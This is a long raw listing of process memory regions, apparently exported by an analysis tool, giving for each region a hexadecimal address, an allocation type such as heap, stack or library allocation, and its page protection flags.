361D000
heap
page read and write
1C26D000
heap
page read and write
24F1000
trusted library allocation
page read and write
327E000
stack
page read and write
3598000
heap
page read and write
3E50000
heap
page read and write
2E80000
heap
page read and write
2E80000
heap
page read and write
361D000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
3B6D000
heap
page read and write
43A3000
heap
page read and write
1C211000
heap
page read and write
3157000
trusted library allocation
page read and write
495000
heap
page read and write
7FE8B380000
trusted library allocation
page read and write
4038000
heap
page read and write
315D000
trusted library allocation
page read and write
4775000
heap
page read and write
353A000
trusted library allocation
page read and write
3361000
trusted library allocation
page read and write
46A000
heap
page read and write
370000
direct allocation
page read and write
433000
heap
page read and write
353D000
trusted library allocation
page read and write
124EE000
trusted library allocation
page read and write
361D000
heap
page read and write
24C3000
trusted library allocation
page read and write
478000
heap
page read and write
3F54000
direct allocation
page read and write
361D000
heap
page read and write
1C264000
heap
page read and write
353D000
trusted library allocation
page read and write
3D6000
heap
page read and write
23EB000
trusted library allocation
page read and write
43F6000
heap
page read and write
3B6D000
heap
page read and write
39B0000
heap
page read and write
40A1000
heap
page read and write
369F000
trusted library allocation
page read and write
37B6000
heap
page read and write
1C0000
heap
page read and write
306F000
heap
page read and write
361D000
heap
page read and write
409F000
heap
page read and write
448B000
heap
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
2D000
heap
page read and write
3BA0000
trusted library allocation
page read and write
554000
heap
page read and write
405F000
heap
page read and write
3B6D000
heap
page read and write
353D000
trusted library allocation
page read and write
40A000
heap
page read and write
3AF0000
heap
page read and write
2B69000
trusted library allocation
page read and write
6AD000
stack
page read and write
367A000
trusted library allocation
page read and write
3B6D000
heap
page read and write
385000
heap
page read and write
361D000
heap
page read and write
1B41B000
heap
page read and write
7FE8B130000
trusted library allocation
page read and write
524000
heap
page read and write
3B6D000
heap
page read and write
43A0000
heap
page read and write
2B49000
trusted library allocation
page read and write
476D000
heap
page read and write
27A1000
trusted library allocation
page read and write
454B000
heap
page read and write
381B000
heap
page read and write
43AB000
heap
page read and write
255B000
trusted library allocation
page read and write
1D40000
trusted library allocation
page read and write
88F000
stack
page read and write
2FA5000
trusted library allocation
page read and write
39B0000
heap
page read and write
2EAA000
direct allocation
page read and write
3E50000
heap
page read and write
404C000
heap
page read and write
2EF0000
heap
page read and write
495A000
heap
page read and write
367A000
trusted library allocation
page read and write
4054000
heap
page read and write
483000
heap
page read and write
55B000
heap
page read and write
1C640000
heap
page read and write
46F000
heap
page read and write
410000
heap
page read and write
397F000
stack
page read and write
39B0000
heap
page read and write
20DB000
heap
page read and write
57FE000
stack
page read and write
121000
heap
page read and write
56D7000
heap
page read and write
33C0000
trusted library allocation
page read and write
413000
system
page execute and read and write
3B6D000
heap
page read and write
369F000
trusted library allocation
page read and write
27D5000
trusted library allocation
page read and write
10000
heap
page read and write
369F000
trusted library allocation
page read and write
4348000
heap
page read and write
3B6D000
heap
page read and write
4B6000
heap
page read and write
560000
trusted library allocation
page execute and read and write
7FE89C40000
trusted library allocation
page read and write
3F51000
direct allocation
page read and write
27D5000
trusted library allocation
page read and write
4990000
heap
page read and write
2E80000
heap
page read and write
4909000
heap
page read and write
4546000
heap
page read and write
598E000
stack
page read and write
43A6000
heap
page read and write
3AF0000
direct allocation
page read and write
48A000
heap
page read and write
312F000
heap
page read and write
4701000
heap
page read and write
4972000
heap
page read and write
39B0000
heap
page read and write
3AF0000
heap
page read and write
449C000
heap
page read and write
1A659000
heap
page read and write
276E000
trusted library allocation
page read and write
3AF0000
heap
page read and write
39B000
heap
page read and write
57E000
heap
page read and write
25B000
heap
page read and write
3BE000
stack
page read and write
44D6000
heap
page read and write
2B52000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
7FE89AA0000
trusted library allocation
page read and write
2134000
heap
page read and write
2EAD000
direct allocation
page read and write
44D6000
heap
page read and write
254000
heap
page read and write
27DF000
trusted library allocation
page read and write
1A659000
stack
page read and write
20A0000
heap
page read and write
7FE8B370000
trusted library allocation
page read and write
361D000
heap
page read and write
39B0000
heap
page read and write
4B6000
heap
page read and write
3072000
heap
page read and write
17F000
trusted library allocation
page read and write
2B4E000
trusted library allocation
page read and write
2380000
heap
page read and write
1DD7000
direct allocation
page read and write
7FE8B2DC000
trusted library allocation
page read and write
5425000
heap
page read and write
439A000
heap
page read and write
7FE8B3A0000
trusted library allocation
page read and write
3E50000
heap
page read and write
2556000
trusted library allocation
page read and write
2685000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
5741000
heap
page read and write
4370000
heap
page read and write
4E4000
heap
page read and write
160000
trusted library allocation
page read and write
3B00000
direct allocation
page read and write
B3000
stack
page read and write
2B72000
trusted library allocation
page read and write
4435000
heap
page read and write
3E50000
heap
page read and write
2E80000
heap
page read and write
2B77000
trusted library allocation
page read and write
361D000
heap
page read and write
4054000
heap
page read and write
1A4C8000
heap
page execute and read and write
526E000
stack
page read and write
27DF000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
353D000
trusted library allocation
page read and write
5868000
heap
page read and write
361D000
heap
page read and write
594000
heap
page read and write
2384000
heap
page read and write
2EAD000
direct allocation
page read and write
27B2000
trusted library allocation
page read and write
5758000
heap
page read and write
313E000
heap
page read and write
4919000
heap
page read and write
37B6000
heap
page read and write
12431000
trusted library allocation
page read and write
372B000
stack
page read and write
520000
heap
page read and write
4062000
heap
page read and write
592E000
stack
page read and write
369F000
trusted library allocation
page read and write
18D000
trusted library allocation
page execute and read and write
4BE000
heap
page read and write
7FE8B140000
trusted library allocation
page read and write
2604000
trusted library allocation
page read and write
27AB000
trusted library allocation
page read and write
411A000
heap
page read and write
3B69000
heap
page read and write
358A000
stack
page read and write
37AE000
heap
page read and write
39B0000
heap
page read and write
3A8000
heap
page read and write
10000
heap
page read and write
495A000
heap
page read and write
4B6000
heap
page read and write
4331000
heap
page read and write
497000
heap
page read and write
17D000
trusted library allocation
page execute and read and write
361D000
heap
page read and write
2E80000
heap
page read and write
4058000
heap
page read and write
CE000
heap
page read and write
140000
trusted library allocation
page read and write
700000
heap
page read and write
361B000
heap
page read and write
3B6D000
heap
page read and write
3072000
heap
page read and write
620000
direct allocation
page read and write
3128000
heap
page read and write
1246D000
trusted library allocation
page read and write
378E000
heap
page read and write
600000
direct allocation
page read and write
557000
heap
page read and write
4484000
heap
page read and write
27D5000
trusted library allocation
page read and write
40AB000
heap
page read and write
27D5000
trusted library allocation
page read and write
3B6D000
heap
page read and write
2B52000
trusted library allocation
page read and write
3753000
heap
page read and write
3450000
direct allocation
page read and write
48DD000
stack
page read and write
273000
trusted library allocation
page execute and read and write
381C000
heap
page read and write
56E2000
heap
page read and write
2B4D000
trusted library allocation
page read and write
27DF000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
3BF4000
direct allocation
page read and write
3E50000
heap
page read and write
3E50000
heap
page read and write
57F2000
heap
page read and write
3AF0000
heap
page read and write
890000
trusted library allocation
page execute and read and write
478000
heap
page read and write
3B6D000
heap
page read and write
39B0000
heap
page read and write
42B000
heap
page read and write
2E80000
heap
page read and write
39B0000
heap
page read and write
514000
heap
page read and write
44D6000
heap
page read and write
27D5000
trusted library allocation
page read and write
13B000
heap
page read and write
3561000
trusted library allocation
page read and write
4062000
heap
page read and write
1ACA4000
heap
page read and write
34E000
heap
page read and write
3AF0000
heap
page read and write
3B6D000
heap
page read and write
2E80000
heap
page read and write
3154000
heap
page read and write
47D000
stack
page read and write
20000
heap
page read and write
1AE76000
heap
page read and write
3B6D000
heap
page read and write
3AF0000
heap
page read and write
3AF0000
heap
page read and write
3131000
heap
page read and write
12451000
trusted library allocation
page read and write
8C0000
heap
page execute and read and write
359E000
heap
page read and write
3F40000
direct allocation
page read and write
43A9000
heap
page read and write
3AF0000
direct allocation
page read and write
3D7000
heap
page read and write
43A9000
heap
page read and write
439D000
heap
page read and write
3091000
heap
page read and write
4AB000
unkown
page readonly
353A000
trusted library allocation
page read and write
7FFFFF20000
trusted library allocation
page execute and read and write
495A000
heap
page read and write
3B5C000
heap
page read and write
2D8000
stack
page read and write
71B000
heap
page read and write
47B000
heap
page read and write
3F51000
direct allocation
page read and write
367A000
trusted library allocation
page read and write
439E000
heap
page read and write
1EF0000
heap
page read and write
39B0000
heap
page read and write
33E000
heap
page read and write
70D000
heap
page read and write
44EE000
stack
page read and write
39B0000
heap
page read and write
16C000
heap
page read and write
7FE89BFA000
trusted library allocation
page read and write
4043000
heap
page read and write
353A000
trusted library allocation
page read and write
42DE000
stack
page read and write
577000
heap
page read and write
405C000
heap
page read and write
7FFFFF87000
trusted library allocation
page execute read
369F000
trusted library allocation
page read and write
430000
heap
page read and write
374F000
heap
page read and write
353D000
trusted library allocation
page read and write
2B5000
stack
page read and write
56CB000
heap
page read and write
290000
trusted library allocation
page read and write
4DED000
heap
page read and write
2700000
remote allocation
page read and write
3B6D000
heap
page read and write
39F000
heap
page read and write
4915000
heap
page read and write
44DB000
heap
page read and write
3C0000
heap
page read and write
3615000
heap
page read and write
4169000
heap
page read and write
4919000
heap
page read and write
170000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
7FE8B2E0000
trusted library allocation
page execute and read and write
43E000
heap
page read and write
174000
trusted library allocation
page read and write
27DF000
trusted library allocation
page read and write
1DA0000
heap
page read and write
2E80000
heap
page read and write
20F0000
heap
page execute and read and write
4936000
heap
page read and write
530000
heap
page read and write
48A000
heap
page read and write
12421000
trusted library allocation
page read and write
10000
heap
page read and write
2B6A000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
386C000
trusted library allocation
page read and write
312B000
heap
page read and write
690000
heap
page read and write
670000
heap
page read and write
56BF000
heap
page read and write
27AB000
trusted library allocation
page read and write
361D000
heap
page read and write
56A7000
heap
page read and write
2402000
trusted library allocation
page read and write
582D000
heap
page read and write
1DE3000
direct allocation
page read and write
3B65000
heap
page read and write
369F000
trusted library allocation
page read and write
2B68000
trusted library allocation
page read and write
4779000
heap
page read and write
353A000
trusted library allocation
page read and write
381D000
heap
page read and write
90000
heap
page read and write
361D000
heap
page read and write
483000
heap
page read and write
2DD0000
direct allocation
page read and write
39D000
direct allocation
page read and write
27A7000
trusted library allocation
page read and write
3598000
heap
page read and write
353A000
trusted library allocation
page read and write
42ED000
heap
page read and write
3B6C000
heap
page read and write
369F000
trusted library allocation
page read and write
2E80000
heap
page read and write
4543000
heap
page read and write
305C000
heap
page read and write
439B000
heap
page read and write
2B71000
trusted library allocation
page read and write
353D000
trusted library allocation
page read and write
4169000
heap
page read and write
367A000
trusted library allocation
page read and write
369F000
trusted library allocation
page read and write
7FFFFF89000
trusted library allocation
page execute read
4043000
heap
page read and write
312D000
heap
page read and write
2E80000
heap
page read and write
404B000
heap
page read and write
452000
heap
page read and write
361D000
heap
page read and write
361D000
heap
page read and write
30CF000
heap
page read and write
3072000
heap
page read and write
4484000
heap
page read and write
2E3E000
stack
page read and write
3389000
trusted library allocation
page read and write
3050000
heap
page read and write
3457000
direct allocation
page read and write
2250000
trusted library allocation
page read and write
53E2000
heap
page read and write
37BA000
stack
page read and write
4330000
heap
page read and write
27AD000
trusted library allocation
page read and write
2D0E000
stack
page read and write
5844000
heap
page read and write
3B6D000
heap
page read and write
2B68000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
3BDC000
stack
page read and write
5890000
heap
page read and write
5809000
heap
page read and write
448F000
heap
page read and write
24ED000
trusted library allocation
page read and write
292000
trusted library allocation
page read and write
2DD0000
heap
page read and write
41C0000
heap
page read and write
5788000
heap
page read and write
4D9000
heap
page read and write
1C10000
heap
page read and write
3417000
trusted library allocation
page read and write
353D000
trusted library allocation
page read and write
1DA4000
heap
page read and write
4946000
heap
page read and write
3E60000
direct allocation
page read and write
2E80000
heap
page read and write
4096000
heap
page read and write
1C1D1000
heap
page read and write
405C000
heap
page read and write
2D9000
heap
page read and write
3B00000
direct allocation
page read and write
476C000
heap
page read and write
274000
trusted library allocation
page read and write
2EAC000
stack
page read and write
27AF000
trusted library allocation
page read and write
40A7000
heap
page read and write
2B0000
heap
page read and write
2E80000
heap
page read and write
39DA000
direct allocation
page read and write
2E80000
heap
page read and write
4060000
heap
page read and write
4058000
heap
page read and write
306D000
heap
page read and write
3091000
heap
page read and write
43A7000
heap
page read and write
1242F000
trusted library allocation
page read and write
2E80000
heap
page read and write
34EF000
stack
page read and write
450000
heap
page read and write
7FE8B320000
trusted library allocation
page read and write
4484000
heap
page read and write
490000
heap
page read and write
3AF0000
heap
page read and write
416E000
heap
page read and write
434000
heap
page read and write
1C310000
heap
page read and write
39B0000
heap
page read and write
3E50000
heap
page read and write
3AF0000
heap
page read and write
313E000
heap
page read and write
27DF000
trusted library allocation
page read and write
574D000
heap
page read and write
4F60000
heap
page read and write
536000
heap
page read and write
2F2000
heap
page read and write
3AF0000
heap
page read and write
3B6D000
heap
page read and write
3E50000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
2B76000
trusted library allocation
page read and write
3C00000
direct allocation
page read and write
46E000
heap
page read and write
3AF0000
heap
page read and write
4399000
heap
page read and write
1A4C0000
heap
page execute and read and write
27AB000
trusted library allocation
page read and write
25B0000
heap
page read and write
2649000
trusted library allocation
page read and write
142000
heap
page read and write
369F000
trusted library allocation
page read and write
415000
heap
page read and write
3C60000
direct allocation
page read and write
2520000
heap
page execute and read and write
369F000
trusted library allocation
page read and write
510000
trusted library allocation
page read and write
247D000
trusted library allocation
page read and write
381B000
heap
page read and write
3AF0000
heap
page read and write
3E50000
heap
page read and write
4043000
heap
page read and write
7FE89A88000
trusted library allocation
page read and write
4229000
heap
page read and write
40AD000
heap
page read and write
24D000
heap
page read and write
3AF0000
heap
page read and write
2768000
trusted library allocation
page read and write
4907000
heap
page read and write
7FFFFF81000
trusted library allocation
page execute read
1C27E000
heap
page read and write
160000
heap
page read and write
58F5000
heap
page read and write
3B6D000
heap
page read and write
2EAA000
direct allocation
page read and write
EB000
stack
page read and write
3F10000
heap
page read and write
3FB0000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
3AD000
heap
page read and write
361C000
heap
page read and write
7FE89BF0000
trusted library allocation
page read and write
4DC000
heap
page read and write
367A000
trusted library allocation
page read and write
5764000
heap
page read and write
229E000
heap
page execute and read and write
3B6D000
heap
page read and write
482000
unkown
page readonly
4549000
heap
page read and write
3BF1000
direct allocation
page read and write
3B6D000
heap
page read and write
39B0000
heap
page read and write
3B6D000
heap
page read and write
416E000
heap
page read and write
27D5000
trusted library allocation
page read and write
490000
unkown
page write copy
3B5E000
heap
page read and write
43A5000
heap
page read and write
3E50000
heap
page read and write
3BA0000
trusted library allocation
page read and write
241E000
trusted library allocation
page read and write
7FE8B304000
trusted library allocation
page read and write
20000
heap
page read and write
5E0E000
stack
page read and write
3BB7000
heap
page read and write
40AD000
heap
page read and write
478000
heap
page read and write
3B6D000
heap
page read and write
32B5000
trusted library allocation
page read and write
FA000
heap
page read and write
2757000
trusted library allocation
page read and write
2E80000
heap
page read and write
33E7000
trusted library allocation
page read and write
7FFFFF88000
trusted library allocation
page readonly
36B0000
trusted library allocation
page read and write
353D000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
52D0000
heap
page read and write
359A000
heap
page read and write
449D000
heap
page read and write
3E50000
direct allocation
page read and write
3B6D000
heap
page read and write
239F000
stack
page read and write
2E80000
heap
page read and write
1C23C000
heap
page read and write
4A25000
heap
page read and write
40A1000
heap
page read and write
131000
heap
page read and write
296000
trusted library allocation
page execute and read and write
3BF4000
direct allocation
page read and write
3804000
heap
page read and write
490000
heap
page read and write
2692000
trusted library allocation
page read and write
3E50000
heap
page read and write
279C000
stack
page read and write
7FE89BA0000
trusted library allocation
page read and write
EFF000
stack
page read and write
30B4000
heap
page read and write
27C8000
trusted library allocation
page read and write
41FF000
heap
page read and write
41C0000
heap
page read and write
1C3B7000
heap
page read and write
29A000
trusted library allocation
page execute and read and write
1A7CC000
stack
page read and write
43FA000
heap
page read and write
20A0000
heap
page read and write
44D6000
heap
page read and write
1C339000
heap
page read and write
2B8000
stack
page read and write
3804000
heap
page read and write
39B0000
heap
page read and write
381C000
heap
page read and write
3132000
heap
page read and write
4936000
heap
page read and write
58EA000
heap
page read and write
2B55000
trusted library allocation
page read and write
483000
heap
page read and write
27A3000
trusted library allocation
page read and write
2E80000
heap
page read and write
4201000
heap
page read and write
27DF000
trusted library allocation
page read and write
367A000
trusted library allocation
page read and write
312D000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
3E50000
heap
page read and write
2E80000
heap
page read and write
5874000
heap
page read and write
315D000
trusted library allocation
page read and write
28AA000
trusted library allocation
page read and write
3B6D000
heap
page read and write
25F7000
trusted library allocation
page read and write
4199000
heap
page read and write
1AF36000
heap
page read and write
3B6D000
heap
page read and write
3BC0000
trusted library allocation
page read and write
411A000
heap
page read and write
414F000
stack
page read and write
4229000
heap
page read and write
5D0000
heap
page read and write
7FE8B440000
trusted library allocation
page read and write
58C6000
heap
page read and write
58A2000
heap
page read and write
361D000
heap
page read and write
27B2000
trusted library allocation
page read and write
44D6000
heap
page read and write
7FE8B400000
trusted library allocation
page read and write
330000
direct allocation
page read and write
D8E000
stack
page read and write
243C000
trusted library allocation
page read and write
402000
system
page execute and read and write
409000
heap
page read and write
43A9000
heap
page read and write
3A9000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
38F000
direct allocation
page read and write
39DD000
direct allocation
page read and write
1EC6000
heap
page read and write
3F54000
direct allocation
page read and write
27A7000
trusted library allocation
page read and write
571D000
heap
page read and write
39DA000
direct allocation
page read and write
135000
stack
page read and write
12391000
trusted library allocation
page read and write
1B7000
trusted library allocation
page execute and read and write
40E1000
heap
page read and write
382D000
heap
page read and write
2B7A000
trusted library allocation
page read and write
1C57E000
stack
page read and write
518E000
stack
page read and write
39B0000
heap
page read and write
2D67000
trusted library allocation
page read and write
4AB000
heap
page read and write
4306000
heap
page read and write
5EEE000
stack
page read and write | page guard
1C20F000
heap
page read and write
37CC000
heap
page read and write
3F60000
direct allocation
page read and write
367A000
trusted library allocation
page read and write
3E50000
heap
page read and write
369F000
trusted library allocation
page read and write
353A000
trusted library allocation
page read and write
3BF1000
direct allocation
page read and write
43AA000
heap
page read and write
4059000
heap
page read and write
3E50000
heap
page read and write
39B0000
heap
page read and write
3804000
heap
page read and write
7FE89940000
trusted library allocation
page execute and read and write
3B6D000
heap
page read and write
7FE89CA0000
trusted library allocation
page read and write
4014000
trusted library allocation
page read and write
1D90000
direct allocation
page read and write
4944000
heap
page read and write
476A000
heap
page read and write
3E50000
heap
page read and write
2D0000
trusted library allocation
page execute and read and write
37CC000
heap
page read and write
2B41000
trusted library allocation
page read and write
5712000
heap
page read and write
668000
heap
page read and write
259000
heap
page read and write
495000
heap
page read and write
3C60000
direct allocation
page read and write
44DA000
heap
page read and write
131000
heap
page read and write
3F60000
direct allocation
page read and write
3463000
direct allocation
page read and write
449C000
heap
page read and write
47A000
heap
page read and write
3110000
trusted library allocation
page read and write
7FE8B470000
trusted library allocation
page read and write
7FE8B360000
trusted library allocation
page read and write
7FE89BF6000
trusted library allocation
page read and write
4401000
heap
page read and write
449C000
heap
page read and write
493A000
heap
page read and write
24A6000
trusted library allocation
page read and write
401000
unkown
page execute read
3B6D000
heap
page read and write
361D000
heap
page read and write
27D5000
trusted library allocation
page read and write
4FA000
heap
page read and write
3150000
heap
page read and write
2574000
trusted library allocation
page read and write
2B7C000
trusted library allocation
page read and write
2E80000
heap
page read and write
EFE000
stack
page read and write | page guard
280000
trusted library allocation
page read and write
485000
heap
page read and write
7FE8B330000
trusted library allocation
page read and write
4A20000
heap
page read and write
7FE8B410000
trusted library allocation
page read and write
10000
heap
page read and write
23A0000
heap
page execute and read and write
3BD000
heap
page read and write
3E50000
heap
page read and write
3BF7000
direct allocation
page read and write
486E000
stack
page read and write
3E50000
heap
page read and write
2440000
trusted library allocation
page read and write
37CC000
heap
page read and write
2060000
trusted library allocation
page read and write
1AA7E000
stack
page read and write
361D000
heap
page read and write
3753000
heap
page read and write
10000
heap
page read and write
39B0000
heap
page read and write
367A000
trusted library allocation
page read and write
7FE8B3C0000
trusted library allocation
page read and write
3900000
heap
page read and write
30E8000
heap
page read and write
374A000
heap
page read and write
27D5000
trusted library allocation
page read and write
478000
heap
page read and write
2641000
trusted library allocation
page read and write
6B4000
heap
page read and write
367A000
trusted library allocation
page read and write
312D000
heap
page read and write
2EAA000
direct allocation
page read and write
4950000
heap
page read and write
2681000
trusted library allocation
page read and write
439000
heap
page read and write
40B2000
heap
page read and write
7FE8B13B000
trusted library allocation
page read and write
3B4000
heap
page read and write
367A000
trusted library allocation
page read and write
361D000
heap
page read and write
369F000
trusted library allocation
page read and write
1B250000
heap
page read and write
37AE000
heap
page read and write
5423000
heap
page read and write
2777000
trusted library allocation
page read and write
2550000
trusted library allocation
page read and write
361D000
heap
page read and write
39B0000
heap
page read and write
2D70000
trusted library allocation
page execute
3AF0000
heap
page read and write
2489000
trusted library allocation
page read and write
420B000
heap
page read and write
353A000
trusted library allocation
page read and write
362000
heap
page read and write
382D000
heap
page read and write
2E80000
heap
page read and write
43A0000
heap
page read and write
3B6D000
heap
page read and write
548F000
stack
page read and write
7FE8B3D0000
trusted library allocation
page read and write
315D000
trusted library allocation
page read and write
1C5AE000
stack
page read and write
31E000
heap
page read and write
27B2000
trusted library allocation
page read and write
E6E000
stack
page read and write | page guard
353D000
trusted library allocation
page read and write
361D000
heap
page read and write
3F51000
direct allocation
page read and write
455D000
heap
page read and write
4700000
heap
page read and write
30D0000
heap
page read and write
1C2D0000
heap
page read and write
2E80000
heap
page read and write
267D000
trusted library allocation
page read and write
1C296000
heap
page read and write
2F4000
heap
page read and write
2DD0000
heap
page read and write
3E50000
heap
page read and write
2B43000
trusted library allocation
page read and write
4A29000
heap
page read and write
314A000
heap
page read and write
44DF000
heap
page read and write
405F000
heap
page read and write
313E000
heap
page read and write
7FE8B350000
trusted library allocation
page read and write
2E80000
heap
page read and write
570000
direct allocation
page read and write
400000
system
page execute and read and write
280000
heap
page read and write
45C6000
heap
page read and write
4919000
heap
page read and write
404B000
heap
page read and write
4A60000
heap
page read and write
306E000
heap
page read and write
3B6D000
heap
page read and write
30D1000
heap
page read and write
41BC000
heap
page read and write
2485000
trusted library allocation
page read and write
27A7000
trusted library allocation
page read and write
27A9000
trusted library allocation
page read and write
538000
heap
page read and write
377000
direct allocation
page read and write
3B6D000
heap
page read and write
3128000
heap
page read and write
53BE000
stack
page read and write
44A2000
heap
page read and write
360E000
heap
page read and write
3B00000
direct allocation
page read and write
361D000
heap
page read and write
7FE8B450000
trusted library allocation
page read and write
CC0000
heap
page read and write
423000
heap
page read and write
4544000
heap
page read and write
39F000
heap
page read and write
3AF0000
heap
page read and write
3E50000
heap
page read and write
2F80000
heap
page read and write
43E1000
heap
page read and write
49E000
stack
page read and write
361D000
heap
page read and write
361D000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
7FFFFF80000
trusted library allocation
page readonly
4936000
heap
page read and write
493D000
heap
page read and write
3AE8000
heap
page read and write
23BE000
trusted library allocation
page read and write
587E000
stack
page read and write
4740000
heap
page read and write
3B6D000
heap
page read and write
1E10000
heap
page read and write
478000
heap
page read and write
361D000
heap
page read and write
267000
heap
page read and write
1C20000
heap
page execute and read and write
1B3E5000
heap
page read and write
569C000
heap
page read and write
414000
system
page execute and read and write
3E50000
heap
page read and write
4EB000
heap
page read and write
420C000
heap
page read and write
39B0000
heap
page read and write
7FE89890000
trusted library allocation
page read and write
3B0000
direct allocation
page read and write
3B6D000
heap
page read and write
2568000
trusted library allocation
page read and write
252F000
stack
page read and write
495000
heap
page read and write
20A5000
heap
page read and write
3B6D000
heap
page read and write
1ACDD000
heap
page read and write
3F6000
heap
page read and write
369F000
trusted library allocation
page read and write
1C640000
heap
page read and write
380000
direct allocation
page read and write
44DF000
heap
page read and write
4548000
heap
page read and write
2B7A000
trusted library allocation
page read and write
1B1D0000
heap
page read and write
160000
trusted library allocation
page read and write
495000
heap
page read and write
27B2000
trusted library allocation
page read and write
2E80000
heap
page read and write
27DF000
trusted library allocation
page read and write
4890000
heap
page read and write
369F000
trusted library allocation
page read and write
361D000
heap
page read and write
37AE000
heap
page read and write
7FE89BC3000
trusted library allocation
page read and write
534000
heap
page read and write
1B28B000
heap
page read and write
3158000
trusted library allocation
page read and write
493B000
heap
page read and write
3B6D000
heap
page read and write
574F000
heap
page read and write
3B6D000
heap
page read and write
3AF0000
heap
page read and write
300000
trusted library allocation
page read and write
33F0000
trusted library allocation
page read and write
3AF0000
heap
page read and write
45C4000
heap
page read and write
361D000
heap
page read and write
38B000
direct allocation
page read and write
3E50000
heap
page read and write
54E000
heap
page read and write
3AD000
heap
page read and write
353D000
trusted library allocation
page read and write
3AF0000
heap
page read and write
39B0000
heap
page read and write
3B6D000
heap
page read and write
37CC000
heap
page read and write
3AE8000
heap
page read and write
361D000
heap
page read and write
3900000
direct allocation
page read and write
3131000
heap
page read and write
1A0000
trusted library allocation
page read and write
2E80000
heap
page read and write
7FE8B1E0000
trusted library allocation
page execute and read and write
3D50000
trusted library allocation
page read and write
409F000
trusted library allocation
page read and write
455F000
heap
page read and write
1C73F000
stack
page read and write
5897000
heap
page read and write
290000
heap
page read and write
483000
heap
page read and write
1E0000
heap
page read and write
405C000
heap
page read and write
30B4000
heap
page read and write
27B2000
trusted library allocation
page read and write
3FC0000
direct allocation
page read and write
2260000
heap
page execute and read and write
353A000
trusted library allocation
page read and write
361D000
heap
page read and write
3071000
heap
page read and write
353D000
trusted library allocation
page read and write
40AE000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
3B6D000
heap
page read and write
361D000
heap
page read and write
2750000
trusted library allocation
page read and write
353D000
trusted library allocation
page read and write
3730000
heap
page read and write
1A6A2000
heap
page read and write
403D000
heap
page read and write
313E000
heap
page read and write
361D000
heap
page read and write
27DF000
trusted library allocation
page read and write
44DF000
heap
page read and write
4484000
heap
page read and write
27B2000
trusted library allocation
page read and write
27AD000
trusted library allocation
page read and write
30B4000
heap
page read and write
39B0000
heap
page read and write
3E0000
direct allocation
page read and write
3AE8000
heap
page read and write
22A000
heap
page read and write
7FE89BE9000
trusted library allocation
page read and write
27D5000
trusted library allocation
page read and write
3BE0000
direct allocation
page read and write
4209000
heap
page read and write
247E000
trusted library allocation
page read and write
2E80000
heap
page read and write
4779000
heap
page read and write
4CF000
heap
page read and write
2405000
trusted library allocation
page read and write
312B000
heap
page read and write
490000
heap
page read and write
2B4A000
trusted library allocation
page read and write
1BF7B000
stack
page read and write
3598000
heap
page read and write
27D5000
trusted library allocation
page read and write
3180000
heap
page read and write
3D0000
direct allocation
page read and write
3B6D000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
43A9000
heap
page read and write
7FE898A0000
trusted library allocation
page read and write
3AEE000
heap
page read and write
758000
heap
page read and write
39B0000
heap
page read and write
58D2000
heap
page read and write
369F000
trusted library allocation
page read and write
30E8000
heap
page read and write
1AE40000
heap
page read and write
4B6000
heap
page read and write
3E60000
direct allocation
page read and write
3AF0000
heap
page read and write
2B49000
trusted library allocation
page read and write
3615000
heap
page read and write
3C00000
direct allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
4913000
heap
page read and write
7FE8B340000
trusted library allocation
page read and write
1A858000
stack
page read and write
2444000
trusted library allocation
page read and write
7FFFFF83000
trusted library allocation
page execute read
3B6D000
heap
page read and write
353D000
trusted library allocation
page read and write
374F000
heap
page read and write
317B000
trusted library allocation
page read and write
460000
heap
page read and write
365F000
stack
page read and write
1A7E9000
stack
page read and write
3B6D000
heap
page read and write
3AF0000
direct allocation
page read and write
3F60000
direct allocation
page read and write
361D000
heap
page read and write
1AEFF000
stack
page read and write
D1E000
stack
page read and write
1A6000
trusted library allocation
page execute and read and write
369F000
trusted library allocation
page read and write
408C000
heap
page read and write
2577000
trusted library allocation
page read and write
39B0000
heap
page read and write
27D5000
trusted library allocation
page read and write
1A85F000
stack
page read and write
1AF00000
heap
page read and write
4DE000
heap
page read and write
1C3000
heap
page read and write
4F1000
heap
page read and write
374A000
heap
page read and write
25FA000
trusted library allocation
page read and write
26A7000
trusted library allocation
page read and write
3430000
trusted library allocation
page read and write
2680000
remote allocation
page read and write
20000
heap
page read and write
7FE8B480000
trusted library allocation
page read and write
41BF000
heap
page read and write
2495000
trusted library allocation
page read and write
361D000
heap
page read and write
353D000
trusted library allocation
page read and write
1D70000
direct allocation
page read and write
2B6E000
trusted library allocation
page read and write
1ACBF000
heap
page read and write
27A9000
trusted library allocation
page read and write
2A1F000
trusted library allocation
page read and write
1B06000
heap
page read and write
378000
stack
page read and write
7FFFFF84000
trusted library allocation
page readonly
3B6D000
heap
page read and write
40A1000
heap
page read and write
361D000
heap
page read and write
263D000
trusted library allocation
page read and write
361D000
heap
page read and write
27D5000
trusted library allocation
page read and write
50DD000
stack
page read and write
4769000
heap
page read and write
4944000
heap
page read and write
495000
heap
page read and write
409000
heap
page read and write
3B6D000
heap
page read and write
404D000
heap
page read and write
2563000
trusted library allocation
page read and write
3BB0000
trusted library allocation
page read and write
3B6D000
heap
page read and write
42B000
heap
page read and write
33E6000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
33BF000
stack
page read and write
427000
heap
page read and write
38D000
heap
page read and write
30B6000
heap
page read and write
4913000
heap
page read and write
1B255000
heap
page read and write
2839000
trusted library allocation
page read and write
3D50000
trusted library allocation
page read and write
174000
heap
page read and write
1A5DA000
heap
page read and write
4C0000
trusted library allocation
page execute and read and write
361D000
heap
page read and write
2EB0000
trusted library allocation
page read and write
313F000
heap
page read and write
359F000
heap
page read and write
361D000
heap
page read and write
339E000
stack
page read and write
